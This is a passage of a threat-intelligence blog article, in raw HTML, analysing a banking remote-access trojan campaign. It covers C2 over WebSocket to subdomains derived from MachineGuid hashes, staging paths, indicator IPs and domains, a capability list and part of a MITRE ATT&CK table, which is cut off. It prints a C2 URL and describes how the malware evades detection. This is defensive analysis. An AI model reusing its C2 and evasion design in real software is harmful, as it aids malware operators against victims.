https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/10-Decoded-VBS-Launcher-270x142.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/10-Decoded-VBS-Launcher-740x389.png 740w\" sizes=\"auto, (max-width: 979px) 100vw, 979px\" \/><figcaption class=\"wp-element-caption\">Decoded VBS Launcher<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"871\" height=\"552\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/11-Newer-branch-process-tree.png\" alt=\"\" class=\"wp-image-21934\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/11-Newer-branch-process-tree.png 871w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/11-Newer-branch-process-tree-300x190.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/11-Newer-branch-process-tree-768x487.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/11-Newer-branch-process-tree-370x234.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/11-Newer-branch-process-tree-270x171.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/11-Newer-branch-process-tree-740x469.png 740w\" sizes=\"auto, (max-width: 871px) 100vw, 871px\" \/><figcaption class=\"wp-element-caption\">Newer branch process tree<\/figcaption><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">WebSocket C2 and Host-Derived Domains<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Instead of the older windowns-cdn pattern, the runtime payload builds a host-specific domain from the victim&#8217;s MachineGuid: MD5(MachineGuid).testewin.com. In this detonation the resolved domain was 52facc3b24f8bad9c5c56819e385f3a1.testewin.com, and the payload connected to:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>wss:\/\/52facc3b24f8bad9c5c56819e385f3a1.testewin.com:443\/agent<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">ANY.RUN showed the domain resolving to Cloudflare addresses 104[.]21.39.21 and 172[.]67[.]142[.]55. The runtime payload also contains a fallback domain (cdn.testewin.com), a fallback IP (149[.]56[.]12[.]51), protocol version 11.07-FAST-RECONNECT, and protocol magic LQWP. That fallback IP links the newer branch directly to the older one.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"677\" height=\"258\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/12-WebSocket-C2-to-agent.png\" alt=\"\" class=\"wp-image-21936\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/12-WebSocket-C2-to-agent.png 677w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/12-WebSocket-C2-to-agent-300x114.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/12-WebSocket-C2-to-agent-370x141.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/12-WebSocket-C2-to-agent-270x103.png 270w\" sizes=\"auto, (max-width: 677px) 100vw, 677px\" \/><figcaption class=\"wp-element-caption\">WebSocket C2 to \/agent<\/figcaption><\/figure>\n<\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"693\" height=\"133\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/13-DNS-resolution.png\" alt=\"\" class=\"wp-image-21938\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/13-DNS-resolution.png 693w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/13-DNS-resolution-300x58.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/13-DNS-resolution-370x71.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/13-DNS-resolution-270x52.png 270w\" sizes=\"auto, (max-width: 693px) 100vw, 693px\" \/><figcaption class=\"wp-element-caption\">DNS resolution \/ Cloudflare layer<\/figcaption><\/figure>\n<\/div>\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"420\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/14-Runtime-payload-code-excerpt-1024x420.png\" alt=\"\" class=\"wp-image-21939\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/14-Runtime-payload-code-excerpt-1024x420.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/14-Runtime-payload-code-excerpt-300x123.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/14-Runtime-payload-code-excerpt-768x315.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/14-Runtime-payload-code-excerpt-1536x630.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/14-Runtime-payload-code-excerpt-370x152.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/14-Runtime-payload-code-excerpt-270x111.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/14-Runtime-payload-code-excerpt-740x304.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/14-Runtime-payload-code-excerpt.png 1635w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">c9dba5b0552d879be654.txt Runtime payload code excerpt<\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Threat Intelligence Classification: Chronology and Analytical Assessments<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">To provide a rigorous analytical framework, this campaign&#8217;s technical elements are broken down into observed telemetry, analytical inferences derived from infrastructure leakage, and historical baselines.<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-338\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"12\"\n           data-wpID=\"338\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:25.114854517611%;                    padding:10px;\n                    \"\n                    >\n                                        Feature\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:38.43797856049%;                    padding:10px;\n                    \"\n                    >\n                                        Older branch (May 25, 2026)\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:36.447166921899%;                    padding:10px;\n                    \"\n                    >\n                                        Newer branch (June 09, 2026)\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Initial staging path\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \/st.txt\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \/st.php\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Payload delivery\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \/payload.php\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \/payload.php\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Install path theme\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Fixed ETW-themed paths\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Dynamic ProgramData\\Microsoft\\<SvcName>\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Main payload filename\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        msedgeupdate.txt \/ msedge.txt\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        <FileName>.txt (randomized)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Launcher\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        launcher.exe + service components\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        VBS launcher + hidden PowerShell\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Named executable\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        MicrosoftEdgeUpdateCore.exe\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C7\"\n                    data-col-index=\"2\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        None stable\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Identity model\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Static artifact names\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C8\"\n                    data-col-index=\"2\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Randomized SvcName + FileName\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A9\"\n                    data-col-index=\"0\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Primary C2\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B9\"\n                    data-col-index=\"1\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        c.windowns-cdn.com \u2192 149.56.12.51\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C9\"\n                    data-col-index=\"2\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        *.testewin.com over WebSocket\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A10\"\n                    data-col-index=\"0\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Network masking\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B10\"\n                    data-col-index=\"1\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Pseudo-Microsoft hostname\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C10\"\n                    data-col-index=\"2\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Hashed subdomain + Cloudflare\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A11\"\n                    data-col-index=\"0\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Transport\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B11\"\n                    data-col-index=\"1\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        HTTPS\/TCP\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C11\"\n                    data-col-index=\"2\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        wss:\/\/<server>:443\/agent\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A12\"\n                    data-col-index=\"0\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Persistence chain\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B12\"\n                    data-col-index=\"1\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Partial (minimal registry export)\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C12\"\n                    data-col-index=\"2\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Clearly reconstructable\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-338'>\ntable#wpdtSimpleTable-338{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-338 td, table.wpdtSimpleTable338 th { white-space: normal !important; }\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<h3 class=\"wp-block-heading\">Prior Reporting &amp; Legacy Baseline<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Infrastructure Origin<\/strong>: Historical tracking from May 2026 established the initial staging footprint on the IP 198[.]245[.]53[.]26, utilizing primitive HTTP staging paths (\/st.txt).<\/li>\n\n\n\n<li><strong>Static Execution Blueprint<\/strong>: The older branch relied entirely on static, predictable installation targets themed after Windows Event Tracing (ETW) logs (<em>\\Microsoft\\Diagnosis\\ETW<\/em>) and a single pseudo-Microsoft C2 domain (<em>c.windowns-cdn.com<\/em>).<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Observed Telemetry (Factual Artifacts)<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Exposed Staging Infrastructure<\/strong>: Identification of an open directory on 198[.]245[.]53[.]26 exposing the production backend framework, including <em>servidor_completo_pool.py<\/em> (a FastAPI payload generation manager) and ofuscador[.]py.<\/li>\n\n\n\n<li><strong>Dynamic Endpoint Execution<\/strong>: Sandbox execution of the June 2026 branch (st[.]php.malw) confirmed a migration to runtime-generated paths based on the victim&#8217;s environment and a VBScript launcher wrapper.<\/li>\n\n\n\n<li><strong>Encrypted WebSocket Transport<\/strong>: Network telemetry confirmed C2 migration to secure WebSockets (wss:\/\/.testewin.com:443\/agent) routing through Cloudflare edges (104[.]21[.]39[.]21 \/ 172[.]67[.]142[.]55).<\/li>\n<\/ul>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\n<span class=\"highlight\">Accelerate investigations and enrich security workflows<\/span><br>\nDetection, threat intelligence, hunting, proactive defense.\n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/app.any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=bananarat&amp;utm_term=070726&amp;utm_content=linktoservice\" rel=\"noopener\" target=\"_blank\">\nStart here\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h3 class=\"wp-block-heading\">Analytical Inferences<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Malware-as-a-Service (MaaS) Engine<\/strong>: The recovery of <em>servidor_completo_pool.py<\/em> and its asynchronous pre-generation functions (<em>code_pool.warmup_all()<\/em>) strongly infers that the threat actors are running an automated, on-demand variant distribution platform to supply multiple affiliates.<\/li>\n\n\n\n<li><strong>Defeating Bulk Network Clustering<\/strong>: The automated generation of unique subdomains derived from the victim&#8217;s <em>MachineGuid<\/em> is a calculated architectural choice. It ensures that defense mechanisms cannot sinkhole or block the core C2 infrastructure via generic domain-level blacklisting without risking collateral disruption of legitimate fronting services.<\/li>\n\n\n\n<li><strong>Evasion Optimization Gaps<\/strong>: While the operators successfully upgraded their network transport layers (WebSockets\/Cloudflare), Cloudflare is primarily utilized here to obscure the backend origin infrastructure and complicate direct IP-based blocking. However, since the campaign relies on a dedicated malicious apex domain (<em>*.testewin.com<\/em>), defenders can effectively deploy blocks at the domain, SNI, or DNS level without risking collateral disruption to unrelated legitimate services hosted behind Cloudflare.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Execution Flow Comparison<\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"968\" height=\"724\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/15-Execution-Flow.png\" alt=\"\" class=\"wp-image-21944\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/15-Execution-Flow.png 968w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/15-Execution-Flow-300x224.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/15-Execution-Flow-768x574.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/15-Execution-Flow-370x277.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/15-Execution-Flow-270x202.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/15-Execution-Flow-740x553.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/07\/15-Execution-Flow-80x60.png 80w\" sizes=\"auto, (max-width: 968px) 100vw, 968px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Capability Assessment<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Based on payload content, sandbox behavior, and prior branch context, this branch supports:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Hidden PowerShell staging and dynamic host-specific installation<\/li>\n\n\n\n<li>Persistence via Scheduled Task (preferred) and Run key fallback<\/li>\n\n\n\n<li>WebSocket C2 with resilient reconnect logic (11.07-FAST-RECONNECT)<\/li>\n\n\n\n<li>Screen and session monitoring<\/li>\n\n\n\n<li>Remote input capability<\/li>\n\n\n\n<li>System and process discovery<\/li>\n\n\n\n<li>File transfer and enumeration<\/li>\n\n\n\n<li>Key input tracking and screen capture \/ overlay workflows<\/li>\n\n\n\n<li>Runtime C# compilation via csc.exe and cvtres.exe<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>This is not a downloader. It is a fully-featured banking-oriented remote access payload.<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">MITRE ATT&amp;CK Mapping<\/h2>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-339\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"4\"\n           data-rows=\"13\"\n           data-wpID=\"339\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-align-center wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:11.515151515152%;                    padding:10px;\n                    \"\n                    >\n                                        Tactic\u00a0\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-align-center wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:34.621212121212%;                    padding:10px;\n                    \"\n                    >\n                                        Technique\u00a0\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-align-center wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:6.6666666666667%;                    padding:10px;\n                    \"\n                    >\n                                        ID\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-align-center wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"D1\"\n                    data-col-index=\"3\"\n                    data-row-index=\"0\"\n                    style=\" width:47.19696969697%;                    padding:10px;\n                    \"\n                    >\n                                        Evidence\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Execution\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Command and Scripting Interpreter: PowerShell\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1059.001\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"D2\"\n                    data-col-index=\"3\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Hidden staging execution chains, dynamic base64 assembly, and memory-only execution\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Execution\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Command and Scripting Interpreter: Visual Basic\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1059.005\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"D3\"\n                    data-col-index=\"3\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Use of a standalone .vbs wrapper to launch the primary payload dropped into ProgramData\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Persistence\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Scheduled Task\/Job: Scheduled Task\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1053.005\u00a0\u00a0                    <\/td>\n                                                <td 